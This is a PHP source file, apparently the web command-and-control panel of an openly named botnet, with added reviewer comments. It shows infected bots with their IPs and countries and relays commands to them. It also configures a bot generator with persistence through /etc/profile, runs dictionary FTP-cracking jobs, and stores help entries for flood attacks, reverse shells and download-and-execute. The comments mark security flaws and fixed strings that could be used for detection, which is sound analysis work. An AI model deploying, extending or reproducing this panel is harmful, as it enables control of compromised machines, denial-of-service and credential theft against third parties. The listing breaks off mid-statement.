
/php/index.php

https://bitbucket.org/foilo/hybrid-bot-v1-openshift-quickstarter
PHP | 889 lines | 806 code | 52 blank | 31 comment | 123 complexity | 847469e4ab3ad87939b9d59b37c82e69 MD5 | raw file
  1. <?php
  2. require_once("GeoIP/geoip.inc");
  // Legacy GeoIP database handle; the stats page passes it to
  // geoip_country_name_by_addr() to label each stored bot IP with a country.
  3. $gi = geoip_open("GeoIP/GeoIP.dat",GEOIP_STANDARD);
  // At file scope `global` has no effect unless this file is included from
  // inside a function; both variables are assigned from the database below.
  4. global $current_ip;
  5. global $current_port; // for e.r.t.e connection
  // 1 = require HTTP Basic authentication before anything else runs.
  6. $prot = 1;
  7. /*Login to admin panel*/
  // Credentials are stored as unsalted MD5 digests, and the same digest is
  // used for both the user name and the password.
  // NOTE(review): md5('1') is c4ca4238a0b923820dcc509a6f75849b, so the
  // "(currently: 1)" remarks below look stale for the digest shown.
  8. $name='8f1892ba664544b32307ec668f23deba'; // md5 , you want to edit this (currently: 1)
  9. /*Password for admin login*/
  10. $pass='8f1892ba664544b32307ec668f23deba'; // md5 , you want to edit this (currently: 1)
  // Access gate: the Basic-auth user name and password are MD5-hashed and
  // compared with the digests above. On a mismatch the script answers 401 with
  // a fixed realm and body text and stops. Both strings are constant, so they
  // can be matched in HTTP response logs or by a web-content signature.
  11. if($prot == 1) {
  12. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
  13. header('WWW-Authenticate: Basic realm="Hybrid Remote Administration Control System"');header('HTTP/1.1 401 Unauthorized');
  14. exit("Admin panel: Access Denied");}}
  15. $POST_MAX_SIZE = ini_get('post_max_size'); // POST request max size
  16. $UP_MAX_SIZE = ini_get('upload_max_filesize'); // upload max size
  // Directory (relative to this script) that holds the uploaded word lists.
  17. $DICTIONARY_PATH = "dict/";
  // Checkbox selection posted from the stats table (name='box[]'). Read without
  // isset(); not referenced again in the visible part of the file.
  18. $box = $_POST['box'];
  19. /*******************************************************************/
  20. /************YOU HAVE TO EDIT THIS!!!!!!!!**************************/
  21. /*******************************************************************/
  // Placeholder database settings; the values shown are template text, not
  // working credentials.
  22. $host = "LOCALHOST"; //database host
  23. $login = "DB_USER"; //database user
  24. $password = "DB_PASS"; //password for database
  25. $database = "DB_APP_NAME"; // database name
  26. $table = "bots"; // will be created automatically
  27. /*******************************************************************/
  28. /********************YOU HAVE TO EDIT THIS!!!***********************/
  29. /*******************************************************************/
  /**
   * Open the MySQL connection used by the rest of the page and select the
   * working database.
   *
   * Uses the legacy mysql_* extension (removed in PHP 7.0). No link resource
   * is returned, so every later mysql_query() call relies on the implicit
   * "last opened" connection. Failures are only printed: the function returns
   * nothing and the caller continues, including the select after a failed
   * connect.
   *
   * @param string $h database host
   * @param string $l database user
   * @param string $p database password
   * @param string $d name of the database to select
   */
  30. function dbconnection($h, $l, $p, $d) {
  31. $conn=mysql_connect($h,$l,$p);
  32. if ($conn===FALSE) {
  33. print('connection failed');
  34. }
  // Selects on the implicit link; loose == comparison against FALSE.
  35. $seldb=mysql_select_db($d);
  36. if ($seldb==FALSE){
  37. print('selection failed');
  38. }
  39. }
  // Table names for the terminal target configuration, the FTP job list and
  // the help texts.
  40. $table_erte_configuration = "erte_configuration";
  41. $ftp_table = "ftp_table";
  42. $help_table = "help_table";
  // Help section chosen in the help form. Read without isset(), so it is null
  // (with a notice/warning) on requests that do not post it.
  43. $help_me = $_POST['help_section'];
  44. dbconnection($host, $login, $password, $database);
  // Load the host/port that terminal commands are sent to. The query result is
  // not checked, and if the table holds several rows the last one wins.
  45. $res = mysql_query("SELECT * FROM $table_erte_configuration");
  46. while ($row = mysql_fetch_assoc($res)) {
  // Unquoted keys are bare constants: PHP < 8 falls back to the strings
  // 'ip'/'port' with a notice or warning, PHP 8 raises an Error.
  47. $current_ip = $row[ip];
  48. $current_port = $row[port];
  49. }
  /**
   * Send one string to a TCP endpoint and return everything it answers.
   *
   * Opens a plain TCP socket (no TLS wrapper is given in the fsockopen() call),
   * writes $cmd once, then reads line by line until the peer closes the
   * connection. Each line read is passed through htmlspecialchars() before it
   * is appended to the result.
   *
   * @param string $host remote host to connect to
   * @param mixed  $port remote port (passed straight to fsockopen())
   * @param string $cmd  payload written to the socket as-is
   * @return string concatenated, HTML-escaped response; empty string when the
   *                connection could not be opened
   */
  50. function SendCommand($host, $port, $cmd){ // ripped from blacksun bot xD
  51. $return_buffer = "";
  // No timeout argument is passed, so PHP's default_socket_timeout applies to
  // the connect; $errno/$errstr are filled in but never reported.
  52. $sock = fsockopen($host,$port,$errno,$errstr);
  53. if (!$sock) {
  54. echo "cant connect to remote server!";
  55. } else {
  56. fputs ($sock,$cmd);
  // Reads until EOF; there is no overall size limit on the response.
  57. while (!feof($sock))
  58. {
  59. $ans = fgets($sock,999666);
  60. $return_buffer .= (htmlspecialchars($ans));
  61. }
  62. }
  // Runs on the failure path too, where $sock is false rather than a stream.
  63. fclose ($sock);
  64. return $return_buffer;
  65. } // end of rip
  66. /************************************************************************************
  67. PHP Terminal class, originally by author 'bzrudi', modified by cross
  68. for usage in this web panel
  69. ************************************************************************************/
  // Session-backed web terminal. It keeps the command history and accumulated
  // output in $_SESSION and forwards each submitted command to the remote
  // endpoint configured in $current_ip / $current_port. All methods are
  // implicitly public and operate directly on the superglobals.
  70. class phpTerm{
  // Stores the prompt string in the session. $user and $host are assigned but
  // never used; the prompt is built from a second posix_getlogin() call.
  71. function formatPrompt(){
  72. $user = posix_getlogin();
  73. $host = "x1m";
  74. $_SESSION['prompt'] = posix_getlogin()."~# ";
  75. }
  // Starts the PHP session; always returns true, whatever session_start() did.
  76. function InitSession(){
  77. session_start();
  78. return true;
  79. }
  // Initialises the session state on first use, or again when the request
  // carries a non-empty 'reset' parameter; also blanks the pending command.
  80. function initVars()
  81. {
  82. if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
  83. {
  84. $_SESSION['cwd'] = getcwd();
  85. $_SESSION['history'] = array();
  86. $_SESSION['output'] = '';
  87. $_REQUEST['command'] ='';
  88. }
  89. }
  // Records the submitted command at the front of the session history,
  // removing an earlier identical entry first. The command text is stored as
  // received from the request.
  90. function buildCommandHistory()
  91. {
  92. if(!empty($_REQUEST['command']))
  93. {
  // get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in PHP 8.0.
  94. if(get_magic_quotes_gpc())
  95. {
  96. $_REQUEST['command'] = stripslashes($_REQUEST['command']);
  97. }
  98. // drop the command from the list if it is already there
  99. if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
  100. {
  101. unset($_SESSION['history'][$i]);
  102. }
  103. array_unshift($_SESSION['history'], $_REQUEST['command']);
  104. // append command
  // Only this one literal command writes to the output buffer here; every
  // other command is echoed later by outputHandle().
  105. if(($_REQUEST['command']) === "shit"){
  106. $_SESSION['output'] .= "Your Question: "."{$_REQUEST['command']}"."\n";
  107. $_SESSION['output'] .= "{$_SESSION['prompt']}"."no fucking xD"."\n";
  108. }
  109. //$_SESSION['output'] .= "{$_SESSION['prompt']}"."{$_REQUEST['command']}"."\n";
  110. }
  111. }
  // Builds the argument list for the JavaScript `new Array(...)` call in the
  // page's <script> block from the session history.
  112. function buildJavaHistory()
  113. {
  114. // build command history for use in the JavaScript
  115. if (empty($_SESSION['history']))
  116. {
  117. $_SESSION['js_command_hist'] = '""';
  118. }
  119. else
  120. {
  // addslashes() escapes quotes and backslashes only. It is not a JavaScript
  // context encoder: newlines and a literal "</script>" pass through unchanged.
  // json_encode() would be the context-appropriate choice.
  121. $escaped = array_map('addslashes', $_SESSION['history']);
  122. $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
  123. }
  124. }
  // Expands an alias on the first word of the command, sends the command to
  // the configured endpoint and appends the answer to the session output.
  // $aliases is expected to map an alias word to its replacement text.
  125. function outputHandle($aliases){
  126. global $current_ip;
  127. global $current_port; // for e.r.t.e connection
  128. chdir($_SESSION['cwd']);
  129. /* Alias expansion. */
  130. $length = strcspn($_REQUEST['command'], " \t");
  131. $token = substr(@$_REQUEST['command'], 0, $length);
  132. if (isset($aliases[$token]))
  133. $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
  134. $bot_command = $_REQUEST['command'];
  135. if($bot_command != ""){
  136. $_SESSION['output'] .= "hybrid~# ".$bot_command."\n";
  // The command travels as plain base64 over the socket opened by
  // SendCommand(). Base64 is an encoding, not encryption, so the traffic is
  // readable to anything that can observe the connection.
  137. $encoded = SendCommand($current_ip, $current_port, base64_encode($bot_command));
  // SendCommand() HTML-escaped the still-encoded text; the decoded result is
  // appended without any further escaping.
  138. $_SESSION['output'] .= base64_decode($encoded);
  139. }
  140. }
  141. } // end phpTerm
  142. /************************************************************************************
  143. End of php terminal class
  144. ************************************************************************************/
  // Per-request driver for the terminal: start the session, reset state if
  // needed, record the submitted command, rebuild the JavaScript history and
  // forward the command. This runs on every page, not only the terminal view.
  145. $terminal=new phpTerm;
  146. if($terminal->InitSession()){
  147. $terminal->initVars();
  148. $terminal->buildCommandHistory();
  149. $terminal->buildJavaHistory();
  // The prompt is created only once per session, after the first history pass.
  150. if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
  // NOTE(review): $aliases is not defined anywhere in the visible source, so
  // alias expansion in outputHandle() never matches. Confirm against the full file.
  151. $terminal->outputHandle($aliases);
  152. }
  153. ?>
  154. <html><head><title>Hybrid Botnet Control System</title>
  155. <style type="text/css">
  156. .style1 {
  157. font-family: Geneva;
  158. font-size: 13px;
  159. color: white;
  160. }
  161. form { margin:0px; padding:0px}
  162. body {
  163. background-image: #000;
  164. background-attachment:fixed;
  165. background-position:center;
  166. background-repeat:repeat;
  167. background-color:black;
  168. color: #555;
  169. margin: 0 0;
  170. text-align: left;
  171. font: normal 0.7em sans-serif,Arial;
  172. }
  173. code {
  174. font: normal 1.1em serif, Arial;
  175. background: url(dark.jpg);
  176. color: #888;
  177. display: block;
  178. padding: 3px 6px;
  179. margin-bottom: 12px;
  180. }
  181. .banner {
  182. font: normal 1.1em serif, Arial;
  183. background: url(images/bg.png);
  184. background-position:center;
  185. background-repeat:repeat;
  186. color: #888;
  187. width: 900px;
  188. text-align: left;
  189. display: block;
  190. padding: 3px 6px;
  191. margin-bottom: 12px;
  192. border:1px;
  193. border-style:solid;
  194. border-color:#383838 ;
  195. }
  196. a{ color:#FFFFFF; text-decoration:none}
  197. a:hover{ text-decoration:underline}
  198. textarea {
  199. border:1px solid #383838;
  200. background:transparent;
  201. color:ghostwhite;
  202. width:800px;
  203. height:auto;
  204. font-size: smaller;
  205. font-family:georgia;
  206. }
  207. </style>
  208. <script type="text/javascript" language="JavaScript">
  // Index of the history entry currently shown in the command input.
  209. var current_line = 0;
  // History entries are injected server-side from $_SESSION['js_command_hist'],
  // which is built with addslashes() in phpTerm::buildJavaHistory().
  210. var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
  // Declared but not used by the functions below.
  211. var last = 0;
  // keyup handler for the command input: ArrowUp (38) steps to an older history
  // entry, ArrowDown (40) to a newer one. The text currently in the input is
  // written back into the history slot before moving.
  212. function key(e) {
  // Fallback for browsers that expose the event only as window.event.
  213. if (!e) var e = window.event;
  214. if (e.keyCode == 38 && current_line < command_hist.length-1) {
  215. command_hist[current_line] = document.shell.command.value;
  216. current_line++;
  217. document.shell.command.value = command_hist[current_line];
  218. }
  219. if (e.keyCode == 40 && current_line > 0) {
  220. command_hist[current_line] = document.shell.command.value;
  221. current_line--;
  222. document.shell.command.value = command_hist[current_line];
  223. }
  224. }
  // onload handler: disables autocomplete on the "shell" form, scrolls the
  // output area to its end and focuses the command input. It assumes the
  // "shell" form exists, which the PHP below renders only for the terminal view.
  225. function init() {
  226. document.shell.setAttribute("autocomplete", "off");
  227. document.shell.output.scrollTop = document.shell.output.scrollHeight;
  228. document.shell.command.focus();
  229. }
  230. </script>
  231. </head>
  232. <body bgcolor="#000000" text="#FFFFFF" onload="init()">
  233. <center><div class="banner">
  234. <center><h2><font color="orange" face="georgia">&copy Hybrid Remote Administration Control System</font> </h2></center>
  235. <center>
  236. <a href = "index.php"><span class="style1">[ Terminal ]</span></a>
  237. <a href = "?page=stats"><span class="style1">[ Statistics and Control Panel ]</span></a>
  238. <a href = "?page=config"><span class="style1">[ Hybrid Generator ]</span></a>
  239. <a href = "?page=dict"><span class="style1">[ Dictionary Files ]</span></a>
  240. <a href = "?page=ftpcrack"><span class="style1">[ FTP Cracking Progress ]</span></a>
  241. <a href = "?page=help"><span class="style1">[ Hybrid Help ]</span></a></center>
  242. </div> </center>
  243. <!--
  244. <form name="form1" method="post" action="" enctype="multipart/form-data">
  245. -->
  246. <table style="border:#000000 1px solid; background:url(images/world.png) no-repeat" align="center">
  247. <tr><td style="width:900px;height:350px">
  248. <?php
  249. /**********************************************************************************/
  250. // main page, this time focused on remote terminal
  251. if($_GET['page'] == ""){
  252. ?>
  253. <h4><font color="orange" face="georgia">&raquo; Encrypted Remote Terminal Emulator </font></h4>
  254. <table cellpadding="0" cellspacing="0">
  255. <tr><td colspan='2'>
  256. <form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
  257. <center>
  258. <textarea name="output" readonly="readonly" cols="65" rows="20">
  259. <?php
  // Pads the session output with leading newlines up to 'rows'+1 lines, then
  // prints it inside the <textarea>. $_REQUEST['rows'] is used in arithmetic
  // without validation, and the output buffer is echoed without HTML escaping.
  // NOTE(review): no form field named 'rows' appears in the visible markup.
  260. $lines = substr_count($_SESSION['output'], "\n");
  261. $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
  262. echo rtrim($padding . $_SESSION['output']);
  263. ?>
  264. </textarea>
  265. </center>
  266. <p><?php echo "<font color='orange'><small>".get_current_user()."~# </small></font>"; ?>
  267. <input name="command" type="text" style="border-bottom:#383838 1px solid;border-top:none;border-left:none;border-right:none;background:transparent;color:#fff" onkeyup="key(event)" size="100" tabindex="1">
  268. </p>
  269. </form></td></tr>
  270. <?php
  271. }
  272. /**********************************************************************************/
  273. ?>
  274. <form name="form1" method="post" action="" enctype="multipart/form-data">
  275. <?php
  276. dbconnection($host, $login, $password, $database);
  277. /**********************************************************************************************/
  278. // everything related to the help page
  279. if($_GET['page'] == "help") {
  280. if($help_me){
  281. $res = mysql_query("SELECT * FROM $help_table");
  282. $total_entries = mysql_num_rows($res);
  283. while ($row = mysql_fetch_assoc($res)) {
  284. $about = $row[about];
  285. $terminal_about = $row[terminal_about];
  286. $stats_about = $row[stats_about];
  287. $hygen_about = $row[hygen_about];
  288. $dict_about = $row[dict_about];
  289. $ftpcrack_about = $row[ftpcrack_about];
  290. $sleep_cmd_help = $row[sleep_cmd_help];
  291. $tcpstorm_cmd_help = $row[tcpstorm_cmd_help];
  292. $synstorm_cmd_help = $row[synstorm_cmd_help];
  293. $udp_cmd_help = $row[udp_cmd_help];
  294. $delbot_cmd_help = $row[delbot_cmd_help];
  295. $revsh_cmd_help = $row[revsh_cmd_help];
  296. $erte_cmd_help = $row[erte_cmd_help];
  297. $ftpcrack_cmd_help = $row[ftpcrack_cmd_help];
  298. $dlexec_cmd_help = $row[dlexec_cmd_help];
  299. }
  300. if($help_me == "about"){
  301. $array_description = explode("\n", $about);
  302. $c = count($array_description, 0);
  303. for($i = 0; $i < $c; $i++){
  304. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  305. }
  306. } else if ($help_me == "terminal_about"){
  307. $array_description = explode("\n", $terminal_about);
  308. $c = count($array_description, 0);
  309. for($i = 0; $i < $c; $i++){
  310. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  311. }
  312. } else if ($help_me == "stats_about"){
  313. $array_description = explode("\n", $stats_about);
  314. $c = count($array_description, 0);
  315. for($i = 0; $i < $c; $i++){
  316. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  317. }
  318. } else if ($help_me == "hygen_about"){
  319. $array_description = explode("\n", $hygen_about);
  320. $c = count($array_description, 0);
  321. for($i = 0; $i < $c; $i++){
  322. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  323. }
  324. } else if ($help_me == "dict_about"){
  325. $array_description = explode("\n", $dict_about);
  326. $c = count($array_description, 0);
  327. for($i = 0; $i < $c; $i++){
  328. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  329. }
  330. } else if ($help_me == "ftpcrack_about"){
  331. $array_description = explode("\n", $ftpcrack_about);
  332. $c = count($array_description, 0);
  333. for($i = 0; $i < $c; $i++){
  334. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  335. }
  336. } else if ($help_me == "sleep_cmd_help"){
  337. $array_description = explode("\n", $sleep_cmd_help);
  338. $c = count($array_description, 0);
  339. for($i = 0; $i < $c; $i++){
  340. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  341. }
  342. } else if ($help_me == "tcpstorm_cmd_help"){
  343. $array_description = explode("\n", $tcpstorm_cmd_help);
  344. $c = count($array_description, 0);
  345. for($i = 0; $i < $c; $i++){
  346. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  347. }
  348. } else if ($help_me == "synstorm_cmd_help"){
  349. $array_description = explode("\n", $synstorm_cmd_help);
  350. $c = count($array_description, 0);
  351. for($i = 0; $i < $c; $i++){
  352. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  353. }
  354. } else if ($help_me == "udp_cmd_help"){
  355. $array_description = explode("\n", $udp_cmd_help);
  356. $c = count($array_description, 0);
  357. for($i = 0; $i < $c; $i++){
  358. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  359. }
  360. } else if ($help_me == "delbot_cmd_help"){
  361. $array_description = explode("\n", $delbot_cmd_help);
  362. $c = count($array_description, 0);
  363. for($i = 0; $i < $c; $i++){
  364. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  365. }
  366. } else if ($help_me == "revsh_cmd_help"){
  367. $array_description = explode("\n", $revsh_cmd_help);
  368. $c = count($array_description, 0);
  369. for($i = 0; $i < $c; $i++){
  370. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  371. }
  372. } else if ($help_me == "erte_cmd_help"){
  373. $array_description = explode("\n", $erte_cmd_help);
  374. $c = count($array_description, 0);
  375. for($i = 0; $i < $c; $i++){
  376. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  377. }
  378. } else if ($help_me == "ftpcrack_cmd_help"){
  379. $array_description = explode("\n", $ftpcrack_cmd_help);
  380. $c = count($array_description, 0);
  381. for($i = 0; $i < $c; $i++){
  382. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  383. }
  384. } else if ($help_me == "dlexec_cmd_help"){
  385. $array_description = explode("\n", $dlexec_cmd_help);
  386. $c = count($array_description, 0);
  387. for($i = 0; $i < $c; $i++){
  388. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  389. }
  390. }
  391. }
  392. }
  393. /**********************************************************************************************/
  394. // simple statistics table
  // Statistics view: lists every row of the bots table and handles the per-row
  // "Delete" link.
  395. if($_GET['page'] == "stats") {
  396. echo "
  397. <center><table style = 'width: 800px; height: 100px;' border = '1'>
  398. <tr><td><center><font color='orange' face='georgia'><b><small>&raquo; Bot IP &laquo;</small></b></font></center></td>
  399. <td><center><font color='orange' face='georgia'><b><small>&raquo; Country &laquo;</small></b></font></center></td>
  400. <td><center><font color='orange' face='georgia'><b><small>&raquo; Current Command &laquo;</small></b></font></center></td>
  401. <td><center><font color='orange' face='georgia'><b><small>&raquo; Bot Name &laquo;</small></b></font></center></td>
  402. <td><center><font color='orange' face='georgia'><b><small>&raquo; Bot Message &laquo;</small></b></font></center></td>
  403. <td><center><font color='orange' face='georgia'><b><small>&raquo; Check &laquo;</small></b></font></center></td>
  404. <td><center><font color='orange' face='georgia'><b><small>&raquo; Action &laquo;</small></b></font></center></td></tr>";
  405. $res = mysql_query("SELECT * FROM $table");
  // $total_entries is computed but not used in the visible code.
  406. $total_entries = mysql_num_rows($res);
  // The ip, cmd, name and msg columns are written into the HTML and into the
  // delete link without escaping. "!" in cmd/msg is shown as a space, which
  // suggests "!" is the stored field separator (presumably; verify against the
  // gate script, which is not shown here).
  407. while ($row = mysql_fetch_assoc($res)) {
  408. echo "
  409. <tr><td><center><font color='ghostwhite' face = 'georgia' ><small>".$row[ip]."</small></font></center></td>
  410. <td><center><font color='ghostwhite' face = 'georgia' ><small>".geoip_country_name_by_addr($gi, $row[ip])."</small></font></center></td>
  411. <td><center><font color='ghostwhite' face = 'georgia'><small>".str_replace("!", " ", $row[cmd])."</small></font></center></td>
  412. <td><center><font color='ghostwhite' face = 'georgia'><small>".$row[name]."</small></font></center></td>
  413. <td><center><font color='ghostwhite' face = 'georgia'><small>".str_replace("!", " ", $row[msg])."</small></font></center></td>
  414. <td><center><input type='checkbox' name='box[]' value='".$row[ip]."'></center></td>
  415. <td><center><font color='ghostwhite' face = 'georgia'><small><a href = '?page=".$_GET['page']."&bot=delete&name=".$row[name]."'>Delete</a></small></font></center></td>
  416. </tr>
  417. ";
  418. }
  // The delete is a state-changing action on a plain GET request with no
  // request token. Despite its name, $my_ip holds the bot *name*. The SQL is
  // built by string interpolation: htmlspecialchars(addslashes()) is an
  // HTML/quote filter, not a replacement for a parameterised query. The handler
  // runs after the rows above were printed, then reloads the page via script.
  419. if($_GET['bot'] == "delete"){
  420. $my_ip = htmlspecialchars(addslashes($_GET['name']));
  421. mysql_query("DELETE FROM $table WHERE name = '$my_ip'");
  422. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  423. }
  424. echo "</table></center>";
  425. }
  426. /**********************************************************************************************/
  427. if($_GET['page'] == "config") {
  428. ?>
  429. <h4><font color="orange" face="georgia">&raquo; Hybrid Generator</font></h4>
  430. <table>
  431. <tr>
  432. <td><font color="orange"><small>&raquo; Base Bot Name:</small></font></td>
  433. <td><input type="text" name="bot_name" value="Hybrid" size="50"></td>
  434. </tr><tr>
  435. <td><font color="orange"><small>&raquo; Directory to place bot:</small></font></td>
  436. <td><input type="text" name="bot_dir" value="/usr/local/bin/" size="50"></td>
  437. </tr><tr>
  438. <td><font color="orange"><small>&raquo; Default Sleep Time:</small></font></td>
  439. <td><input type="text" name="def_sleep_time" value="10" size="50"></td>
  440. </tr><tr>
  441. <td><font color="orange"><small>&raquo; Home Server:</small></font></td>
  442. <td><input type="text" name="home_server" value="HTTP_HOST" size="50"></td>
  443. </tr><tr>
  444. <td><font color="orange"><small>&raquo; Home Server Port:</small></font></td>
  445. <td><input type="text" name="home_server_port" value="80" size="50"></td>
  446. </tr><tr>
  447. <td><font color="orange"><small>&raquo; Gate Dir:</small></font></td>
  448. <td><input type="text" name="gate_dir" value="<?php print dirname($_SERVER['PHP_SELF']).'/'; ?>" size="50"></td>
  449. </tr><tr>
  450. <td><font color="orange"><small>&raquo; Gate Script:</small></font></td>
  451. <td><input type="text" name="gate_script" value="getcmd.php" size="50"></td>
  452. </tr><tr>
  453. <td><font color="orange"><small>&raquo; Bot's User Agent:</small></font></td>
  454. <td><input type="text" name="bot_ua" value="Hybrid_v.1.0" size="50"></td>
  455. </tr><tr>
  456. <td><font color="orange"><small>&raquo; Autostart File:</small></font></td>
  457. <td><input type="text" name="autostart_file" value="/etc/profile" size="50"></td>
  458. </tr>
  459. </table>
  460. <?php
  461. }
  // Dictionary view: lists the files in $DICTIONARY_PATH, each with a delete link.
  462. if($_GET['page'] == "dict") { // $DICTIONARY_PATH
  // The directory handle is never closed with closedir().
  463. if ($handle = opendir($DICTIONARY_PATH)) {
  464. while (false !== ($file = readdir($handle))) {
  // $info is computed but not used.
  465. $info = pathinfo($file, PATHINFO_EXTENSION);
  466. if ($file != "." && $file != "..") {
  467. $full_path = $DICTIONARY_PATH.$file;
  468. $our_page = $_GET['page'];
  // File names are written into the HTML and the link without escaping.
  469. echo "&nbsp;&nbsp;&nbsp;&nbsp;<font color='orange' face = 'georgia'><small>[ $file ] | <a href = '?page=".$our_page."&act=delete&path=".$full_path."'>Delete</a></small></font><br>";
  // The delete handler sits inside the listing loop, so it runs once per
  // directory entry. The path comes straight from the query string and is not
  // checked to lie inside $DICTIONARY_PATH; htmlspecialchars(addslashes()) does
  // not constrain which file unlink() is asked to remove.
  470. if($_GET['act'] == "delete"){
  471. $path = htmlspecialchars(addslashes($_GET['path']));
  472. unlink($path);
  473. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  474. }
  475. }
  476. }
  477. }
  478. }
  // FTP job view: lists every row of $ftp_table (target ip/port, dictionary
  // file, result) and handles the per-row "Delete" link.
  479. if($_GET['page'] == "ftpcrack") {
  480. echo "
  481. <center><table style = 'width: 800px; height: 100px;' border = '1'>
  482. <tr><td><center><font color='orange' face='georgia'><b><small>&raquo; Ftp Ip &laquo;</small></b></font></center></td>
  483. <td><center><font color='orange' face='georgia'><b><small>&raquo; Ftp Port &laquo;</small></b></font></center></td>
  484. <td><center><font color='orange' face='georgia'><b><small>&raquo; Dict File &laquo;</small></b></font></center></td>
  485. <td><center><font color='orange' face='georgia'><b><small>&raquo; Result &laquo;</small></b></font></center></td>
  486. <td><center><font color='orange' face='georgia'><b><small>&raquo; Action &laquo;</small></b></font></center></td></tr>";
  487. $res = mysql_query("SELECT * FROM $ftp_table");
  // $total_entries is computed but not used in the visible code.
  488. $total_entries = mysql_num_rows($res);
  // Column values, including the result text, are written into the HTML
  // without escaping; only the dictionary path is reduced to its base name.
  489. while ($row = mysql_fetch_assoc($res)) {
  490. echo "
  491. <tr><td><center><font color='ghostwhite' face = 'georgia' ><small>".$row[ip]."</small></font></center></td>
  492. <td><center><font color='ghostwhite' face = 'georgia'><small>".$row[port]."</small></font></center></td>
  493. <td><center><font color='ghostwhite' face = 'georgia'><small>".basename($row[dict])."</small></font></center></td>
  494. <td><center><font color='ghostwhite' face = 'georgia'><small>".str_replace("!", " ", $row[result])."</small></font></center></td>
  495. <td><center><font color='ghostwhite' face = 'georgia'><small><a href = '?page=".$_GET['page']."&ftp=delete&ip=".$row[ip]."'>Delete</a></small></font></center></td>
  496. </tr>
  497. ";
  498. }
  // Same pattern as the stats delete: a GET-triggered delete with no request
  // token and SQL built by interpolation. All rows sharing the given ip are
  // removed, since ip is the only key in the WHERE clause.
  499. if($_GET['ftp'] == "delete"){
  500. $my_ip = htmlspecialchars(addslashes($_GET['ip']));
  501. mysql_query("DELETE FROM $ftp_table WHERE ip = '$my_ip'");
  502. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  503. }
  504. echo "</table></center>";
  505. }
  506. /**********************************************************************************************/
  507. ?>
  508. </td></font></table>
  509. <!-- -------------------------------------------------------------
  510. Here begins bottom table, with options and buttons and controls :X
  511. -------------------------------------------------------------- -->
  512. <center><div class="banner">
  513. <center><table>
  514. <!--
  515. <form name="form1" method="post" action="" enctype="multipart/form-data">
  516. -->
  517. <?php
  // Bottom panel of the FTP job view: renders the "add job" form and inserts
  // the posted job into $ftp_table, then ends the response.
  518. if($_GET['page'] == "ftpcrack") {
  519. ?>
  520. <br><tr>
  521. <td><font color="orange"><small>FTP ip:</small></font></td>
  522. <td><input type="text" name="ftp_ip" value="" size="50"></td>
  523. </tr><tr>
  524. <td><font color="orange"><small>FTP port:</small></font></td>
  525. <td><input type="text" name="ftp_port" value="" size="50"></td>
  526. </tr>
  527. <?php
  528. echo "<tr><td><font color='orange'><small>Dictionary File:</small></font></td>";
  529. echo "<td><SELECT name='dict_file' style='width:365px'>
  530. <OPTION value='none' selected>None</OPTION>";
  // One <OPTION> per file in $DICTIONARY_PATH. File names are emitted without
  // escaping; $info and $our_page are assigned but unused, and the directory
  // handle is not closed.
  531. if ($handle = opendir($DICTIONARY_PATH)) {
  532. while (false !== ($file = readdir($handle))) {
  533. $info = pathinfo($file, PATHINFO_EXTENSION);
  534. if ($file != "." && $file != "..") {
  535. $full_path = $DICTIONARY_PATH.$file;
  536. $our_page = $_GET['page'];
  537. echo "<OPTION value='".$full_path."'>".$file."</OPTION>";
  538. }
  539. }
  540. }
  541. echo "</SELECT></td></tr>";
  542. echo "<tr><td></td><td align = 'left'><input type=\"submit\" value=\" Add \" name=\"action\"></td></tr>";
  // The posted ip, port and dictionary path are not validated for format and
  // are interpolated into the INSERT after htmlspecialchars(addslashes()),
  // which is not a replacement for a parameterised query.
  543. if(!is_null($_POST['action'])){
  544. $ftp_ip = htmlspecialchars(addslashes($_POST['ftp_ip']));
  545. $ftp_port = htmlspecialchars(addslashes($_POST['ftp_port']));
  546. $dict_file = htmlspecialchars(addslashes($_POST['dict_file']));
  547. mysql_query("INSERT INTO $ftp_table (ip, port, dict) VALUES ('$ftp_ip', '$ftp_port', '$dict_file')");
  548. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  549. }
  550. echo "</table><br></center>
  551. <center><font size='1'>&copy www.x1machine.com</font></center>
  552. </div></center>
  553. </body></html>";
  554. exit();
  555. }
  // Allowed upload extensions for dictionary files.
  556. $ext = array('.txt');
  // Bottom panel of the dictionary view: shows the PHP upload limits and
  // stores an uploaded word list in $DICTIONARY_PATH.
  557. if($_GET['page'] == "dict") {
  // NOTE(review): the labels are swapped. "Max Upload Size" prints
  // post_max_size and "Max Post Size" prints upload_max_filesize.
  558. echo "
